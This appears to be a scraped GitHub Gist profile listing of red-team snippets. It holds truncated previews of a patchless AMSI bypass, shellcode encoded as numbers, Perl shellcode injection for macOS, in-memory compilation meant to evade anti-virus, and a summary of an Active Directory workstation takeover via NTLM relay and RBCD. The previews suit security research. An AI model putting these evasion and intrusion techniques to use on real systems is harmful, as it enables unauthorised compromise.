16683189189467061193223884768707748125115707836338683708165636755281807331517563442745553664246724105870945763631169132260927526462734007835204880152893128450692630721572368535326118279180786621255867502609753166175114825563868872386555313011639026159359514256068100949221759953685226158201564474886176814194560402374867089196278252086615234757715302275261377043585010851175293923132633446346692061723922182900523634608569996664845671316859814804344017463762348282301284946271053184374916659024239637068041261659983151054361127497750752691523039603283781627522436175359723245473438312970933225984151370749165828689332628371556231892597912020228904274172
166831891894670611932238847687077481251157078363386837081656367552818073315175634427455536642467241058709457636311691322609275264627340078352048801528931284506926307215723685353261182791807866212558675026097531661751148255638688723865553130116390261593595142560681009492217599536852261582015644748861768141945604023748670891962782520866152347577153022752613770435850
Dwight Hohnstein djhohnstein
djhohnstein
/ output example.md
Created
July 26, 2022 20:19
Shellcode as Numbers - A different kind of calc
djhohnstein
/ patchless_amsi.h
Created
April 18, 2022 15:09
— forked from CCob/patchless_amsi.h
In-Process Patchless AMSI Bypass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #ifndef PATCHLESS_AMSI_H | |
| #define PATCHLESS_AMSI_H | |
| #include <windows.h> | |
| static const int AMSI_RESULT_CLEAN = 0; | |
| PVOID g_amsiScanBufferPtr = nullptr; | |
| unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sing System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Example Reference: | |
| // https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/ | |
| // Test | |
| new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools'; | |
| // Change that C:\\Tools to a location you specify, or dynamically find current directory. | |
| // ActCTX will search for the DLL in TMP | |
| var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>'; |
djhohnstein
/ syscall.pl
Created
October 27, 2021 18:08
— forked from monoxgas/syscall.pl
Perl syscall/sc injection for MacOS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| use DynaLoader; | |
| use Devel::Peek; | |
| use Fcntl; | |
| use 5.008001; # because 5.6 doesn't have B::PV::object_2svref | |
| use Config; | |
| use B (); # for B::PV | |
| sub mmap { | |
| my ($addr, $size, $protect, $flags) = @_; | |
| syscall(197, $addr, $size, $protect, $flags, -1, 0); |
djhohnstein
/ Workstation-Takeover.md
Created
September 13, 2021 17:46
— forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
djhohnstein
/ ConsoleApp.csproj
Created
September 4, 2021 04:52
— forked from AArnott/ConsoleApp.csproj
Async named pipes example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project Sdk="Microsoft.NET.Sdk"> | |
| <PropertyGroup> | |
| <OutputType>exe</OutputType> | |
| <TargetFrameworks>net472;net5.0-windows</TargetFrameworks> | |
| </PropertyGroup> | |
| <ItemGroup> | |
| <PackageReference Include="System.IO.Pipes.AccessControl" Version="5.0.0" /> | |
| </ItemGroup> |
djhohnstein
/ CompileInMemory.cs
Created
September 2, 2021 16:14
— forked from TheKevinWang/CompileInMemory.cs
Compile and run C# code in memory to avoid anti-virus. Taken from a C# ransomware sample: https://www.bleepingcomputer.com/news/security/new-c-ransomware-compiles-itself-at-runtime/ However, this will still execute csc.exe and drop a dll to %temp% https://twitter.com/Laughing_Mantis/status/991018563296157696
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Text; | |
| using System.CodeDom.Compiler; | |
| using Microsoft.CSharp; | |
| using System.IO; | |
| using System.Reflection; | |
| namespace InMemoryCompiler | |
| { | |
| class Program |
djhohnstein
/ vt_target.md
Created
August 19, 2021 13:39
— forked from moohax/vt_target.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function InvokeCreateCertificate(certSubject, isCA) | |
| { | |
| var CAsubject = certSubject; | |
| var dn = new ActiveXObject("X509Enrollment.CX500DistinguishedName"); | |
| dn.Encode( "CN=" + CAsubject, 0); | |
| var issuer = "_TEST_CERT_INSTALL"; | |
| var issuerdn = new ActiveXObject("X509Enrollment.CX500DistinguishedName"); | |
| issuerdn.Encode("CN=" + issuer, 0); | |
| var key = new ActiveXObject("X509Enrollment.CX509PrivateKey"); |